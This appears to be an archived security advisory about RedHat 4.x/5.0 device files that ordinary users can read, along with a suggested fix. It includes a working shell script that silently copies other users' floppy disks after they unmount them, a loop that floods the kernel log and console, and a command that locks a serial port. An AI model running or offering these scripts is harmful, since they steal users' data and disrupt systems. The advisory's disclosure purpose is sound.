COMMAND

    /dev permissions

SYSTEMS AFFECTED

    RedHat 4.x/5.0

PROBLEM

    Michal Zalewski found two problems about /dev permissions.   First
    one is that any user can read data from (even not mounted)  floppy
    using "cat /dev/fd0H1440".  It isn't dangerous itself, but...  Any
    user may write a script,  which periodically checks if floppy  has
    been just unmounted, then dumps it's content to a file.  Here's  a
    sample 'floppy collector':

    #!/bin/sh
    DUMP_DEV=3D/dev/fd0H1440
    MOUNT_DEV=3D/dev/fd0
    LABEL=3D0
    DUMPED=3D1
    while :; do
      sleep 1
      if [ "`mount|grep \"^${MOUNT_DEV}\"`" =3D "" ]; then
        if [ "$DUMPED" =3D "0" ]; then
          echo "Dumping image #$LABEL..."
          cat $DUMP_DEV >.fdimage$LABEL
          let LABEL=3DLABEL+1
          DUMPED=3D1
        fi
      else
        DUMPED=3D0
      fi
    done

    Also, if there's no floppy  in drive, unprivledged user may  flood
    kernel log console (local console by default!):

        [user@host sth]$ while :; do cat /dev/fd0H1440;done &

    It will generate  a lot of  kernel messages, which  will be logged
    to  /var/log/messages  AND  to  console (default klogd behaviour).
    Also, every printk(...) (called by fd driver) uses sync() to flush
    buffers.  It will cause abnormal hdd activity.

    Second problem (not tested with rh 5.0) is that ordinary user  are
    allowed to read /dev/ttyS*. Serial ports driver disallows multiple
    access attempts  at the  same time,  so user  may permanently lock
    choosen port using this command:

        [user@host user]$ cat /dev/ttyS0
        (Ctrl+Z)
        [user@host user]$ cat /dev/ttyS0
        cat: /dev/ttyS0: device is busy

    Now serial port is in unusable state.

SOLUTION

    There  are  also  a  lot  of  other,  not-so-common  devices,  eg.
    /dev/sequencer, which are  world-readable or even  world-writable.
    There's no  ANY reason  to give  ordinary users  direct access  to
    hardware devices. It's quite easy (as shown above ;) to obtain  an
    interesting data or cause system failure by reading/writing  these
    devices.   Solution  is  simply  to  remove  read  bit  from those
    devices for  ordinary users  if not  needed.   Also, good solution
    would be to use allocatable  removalble media devices, as Sun  has
    done with  Trusted Solaris  and the  Solaris BSM  module.   Take a
    look at the scripts Darren J  Moffat has written to do this  under
    Linux (should actually work for anything that runs Perl) at:

        http://www.xarius.demon.co.uk/software/devalloc